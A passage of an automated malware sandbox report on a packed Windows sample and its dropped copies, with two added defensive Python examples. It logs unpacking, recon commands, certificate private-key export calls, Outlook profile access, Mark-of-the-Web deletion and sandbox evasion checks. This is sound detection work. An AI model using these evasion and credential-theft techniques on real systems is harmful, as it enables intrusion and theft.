    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: ctMI3TYXpX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

    Data Obfuscation

    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Unpacked PE file: 0.2.ctMI3TYXpX.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.saxaxi:R;.losucu:R;.rasiye:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\jghruer | Unpacked PE file: 5.2.jghruer.400000.0.unpack .text:ER;.rdata:R;.data:W;.saxaxi:R;.losucu:R;.rasiye:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Unpacked PE file: 6.2.35DB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dilafav:R;.heciw:R;.hirezep:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\hdhruer | Unpacked PE file: 8.2.hdhruer.400000.0.unpack .text:ER;.rdata:R;.data:W;.dilafav:R;.heciw:R;.hirezep:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx, 9_2_00007FF6F2D63220
    Source: ctMI3TYXpX.exe | Static PE information: section name: .saxaxi
    Source: ctMI3TYXpX.exe | Static PE information: section name: .losucu
    Source: ctMI3TYXpX.exe | Static PE information: section name: .rasiye
    Source: 35DB.exe.1.dr | Static PE information: section name: .dilafav
    Source: 35DB.exe.1.dr | Static PE information: section name: .heciw
    Source: 35DB.exe.1.dr | Static PE information: section name: .hirezep
    Source: hdhruer.1.dr | Static PE information: section name: .dilafav
    Source: hdhruer.1.dr | Static PE information: section name: .heciw
    Source: hdhruer.1.dr | Static PE information: section name: .hirezep
    Source: jghruer.1.dr | Static PE information: section name: .saxaxi
    Source: jghruer.1.dr | Static PE information: section name: .losucu
    Source: jghruer.1.dr | Static PE information: section name: .rasiye
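The "Unpacked PE file" entries above encode the check behind the "Detected unpacking (changes PE section rights)" signature: the section table on disk says .text is execute+read, but in the running process .text has become execute+write, which is what an in-place decryption stub needs. The following Python is an added example, not Joe Sandbox code: it parses the section table of a constructed PE (headers only, laid out with the same section names as ctMI3TYXpX.exe), abbreviates rights the way the report prints them (the E/W/R scheme is inferred from the report's own strings and is an assumption), and diffs them against constructed VirtualQuery page protections for the same sections.

```python
"""Reproduce the 'section rights changed' unpacking check on a constructed PE.

Added example, not sandbox or malware code. Assumptions: the report's
abbreviation is E (executable), then W if writable else R; the live side of
the comparison is the page protection VirtualQuery would return per section.
"""
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# MEMORY_BASIC_INFORMATION.Protect values, mapped to the same abbreviation
PAGE_RIGHTS = {0x01: "", 0x02: "R", 0x04: "W", 0x08: "W",
               0x10: "E", 0x20: "ER", 0x40: "EW", 0x80: "EW"}


def rights(characteristics: int) -> str:
    """Abbreviate section Characteristics: '.text:ER', '.data:W', '.text:EW'."""
    out = "E" if characteristics & IMAGE_SCN_MEM_EXECUTE else ""
    if characteristics & IMAGE_SCN_MEM_WRITE:
        out += "W"
    elif characteristics & IMAGE_SCN_MEM_READ:
        out += "R"
    return out


def page_rights(protect: int) -> str:
    """Same abbreviation for a live protection; PAGE_GUARD/NOCACHE bits masked off."""
    return PAGE_RIGHTS[protect & 0xFF]


def section_rights(image: bytes) -> dict:
    """Walk the section table of an on-disk PE image and map name -> rights."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]   # IMAGE_FILE_HEADER
    size_opt = struct.unpack_from("<H", image, e_lfanew + 20)[0]      # SizeOfOptionalHeader
    table = e_lfanew + 24 + size_opt                                  # first section header
    result = {}
    for i in range(num_sections):
        off = table + i * 40
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", image, off + 36)[0]
        result[name] = rights(chars)
    return result


def format_rights(r: dict) -> str:
    """Render like the report: '.text:ER;.rdata:R;...'."""
    return "".join(f"{name}:{val};" for name, val in r.items())


def changed_sections(header: dict, observed: dict) -> dict:
    """Sections whose live protection differs from the header. A stub that
    decrypts code in place must first raise .text to EW; that is the signal."""
    return {n: (header[n], page_rights(observed[n]))
            for n in header if n in observed and header[n] != page_rights(observed[n])}


def build_pe(sections) -> bytes:
    """Constructed minimal PE32: DOS header, NT headers and a section table,
    with no section data, which is all section_rights() reads."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    opt_size = 0xE0
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, chars)
        for name, chars in sections)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + table


R = IMAGE_SCN_MEM_READ
W = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
ER = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE

# Section layout taken from the report's line for ctMI3TYXpX.exe
SAMPLE_ON_DISK = build_pe([(".text", ER), (".rdata", R), (".data", W), (".saxaxi", R),
                           (".losucu", R), (".rasiye", W), (".rsrc", R)])

# Constructed VirtualQuery results after the stub ran: .text is now
# PAGE_EXECUTE_READWRITE (0x40), everything else is unchanged
SAMPLE_IN_MEMORY = {".text": 0x40, ".rdata": 0x02, ".data": 0x04, ".saxaxi": 0x02,
                    ".losucu": 0x02, ".rasiye": 0x04, ".rsrc": 0x02}

if __name__ == "__main__":
    header = section_rights(SAMPLE_ON_DISK)
    diff = changed_sections(header, SAMPLE_IN_MEMORY)
    print(format_rights(header), "vs", "".join(f"{n}:{after};" for n, (_, after) in diff.items()))
```

Run against the constructed pair, the script prints the same ".text:ER;.rdata:R;.data:W;.saxaxi:R;.losucu:R;.rasiye:W;.rsrc:R; vs .text:EW;" shape the report shows. The non-standard names (.saxaxi, .losucu, .rasiye, and .dilafav/.heciw/.hirezep in the second family) are a packer artefact worth keying on as well, but the rights change is the robust signal because it survives a section rename.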
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_004014D9 pushad ; ret 0_2_004014E9
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_004031DB push eax; ret 0_2_004032AB
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_004B1540 pushad ; ret 0_2_004B1550
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00507372 push esp; ret 0_2_00507374
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00506212 pushfd ; iretd 0_2_00506213
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00505715 push B63524ADh; retn 001Fh 0_2_0050574C
    Source: C:\Users\user\AppData\Roaming\jghruer | Code function: 5_2_00531540 pushad ; ret 5_2_00531550
    Source: C:\Users\user\AppData\Roaming\jghruer | Code function: 5_2_00595E32 pushfd ; iretd 5_2_00595E33
    Source: C:\Users\user\AppData\Roaming\jghruer | Code function: 5_2_00595335 push B63524ADh; retn 001Fh 5_2_0059536C
    Source: C:\Users\user\AppData\Roaming\jghruer | Code function: 5_2_00596F92 push esp; ret 5_2_00596F94
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00402842 pushad ; retf F6A4h 6_2_004029D1
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00401065 pushfd ; retf 6_2_0040106A
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00402805 push 21CACAEFh; iretd 6_2_0040280A
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00402511 push ebp; iretd 6_2_00402523
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00403325 push eax; ret 6_2_004033F3
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00403433 pushad ; ret 6_2_004035AB
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00401182 push esp; retf 6_2_0040118E
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00402A9D pushad ; retf 6_2_00402AAB
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_004012B7 push cs; iretd 6_2_004012B8
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_005B2578 push ebp; iretd 6_2_005B258A
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_005B286C push 21CACAEFh; iretd 6_2_005B2871
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_005B131E push cs; iretd 6_2_005B131F
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_005B2B04 pushad ; retf 6_2_005B2B12
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_005B10CC pushfd ; retf 6_2_005B10D1
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_005B11E9 push esp; retf 6_2_005B11F5
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00402842 pushad ; retf F6A4h 8_2_004029D1
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00401065 pushfd ; retf 8_2_0040106A
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00402805 push 21CACAEFh; iretd 8_2_0040280A
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00402511 push ebp; iretd 8_2_00402523
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00403325 push eax; ret 8_2_004033F3
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00403433 pushad ; ret 8_2_004035AB

    Persistence and Installation Behavior

    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\B972.exe
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\35DB.exe
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jghruer
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\hdhruer
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\hdhruer
    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jghruer

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\ctmi3tyxpx.exe
    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\jghruer:Zone.Identifier read attributes | delete
    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\hdhruer:Zone.Identifier read attributes | delete
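The two Zone.Identifier entries are the "Hides that the sample has been downloaded from the Internet" signature: the injected explorer.exe opens the Mark-of-the-Web alternate data stream on each dropped copy with DELETE access, which is the prelude to removing it, so SmartScreen and reputation checks that key on the mark see the persisted copies as local files. The Python below is an added example, not report or malware code: it parses the stream's INI-style contents, classifies the zone, and treats a missing stream exactly as Windows does (no mark, not from the Internet). The stream text is constructed; the reader function only works on NTFS under Windows and returns None elsewhere.

```python
"""Parse an NTFS Zone.Identifier stream (Mark of the Web) and classify it.

Added example, not part of the report. SAMPLE_MOTW is constructed in the
layout Windows writes for a browser download; the URLs are placeholders.
"""

# URLZONE values written into ZoneId
URL_ZONES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
             3: "Internet", 4: "Restricted"}


def parse_zone_identifier(text: str):
    """Return the [ZoneTransfer] keys with ZoneId as int, or None when the
    section is missing or ZoneId is absent / not an integer."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "zonetransfer" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    try:
        fields["ZoneId"] = int(fields["ZoneId"])
    except (KeyError, ValueError):
        return None
    return fields


def zone_name(stream_text):
    """Human-readable zone; 'unmarked' for a missing or malformed stream."""
    info = parse_zone_identifier(stream_text) if stream_text is not None else None
    if info is None:
        return "unmarked"
    return URL_ZONES.get(info["ZoneId"], f"zone {info['ZoneId']}")


def is_from_internet(stream_text) -> bool:
    """True for Internet (3) or Restricted (4). A deleted stream yields False,
    which is what removing it buys the malware."""
    info = parse_zone_identifier(stream_text) if stream_text is not None else None
    return info is not None and info["ZoneId"] >= 3


def read_motw(path: str):
    """Read the stream on NTFS (Windows only); None when absent or elsewhere."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


# Constructed stream content; a real one carries the download's referrer/host
SAMPLE_MOTW = ("[ZoneTransfer]\r\n"
               "ZoneId=3\r\n"
               "ReferrerUrl=https://downloads.example.invalid/\r\n"
               "HostUrl=https://downloads.example.invalid/setup.exe\r\n")

if __name__ == "__main__":
    print(zone_name(SAMPLE_MOTW), is_from_internet(SAMPLE_MOTW))   # Internet True
    print(zone_name(None), is_from_internet(None))                 # unmarked False
```

On a live host, `read_motw(r"C:\Users\user\AppData\Roaming\jghruer")` returning None after the process ran, while the original download still carries ZoneId=3, is the forensic artefact to look for; Sysmon's FileCreateStreamHash event (ID 15) records the stream being written, but its removal leaves no event, so the absence has to be checked directly.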
    Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\jghruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\jghruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\jghruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\jghruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\jghruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\jghruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\hdhruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\hdhruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\hdhruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\hdhruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\hdhruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Users\user\AppData\Roaming\hdhruer | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
    Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_16-882
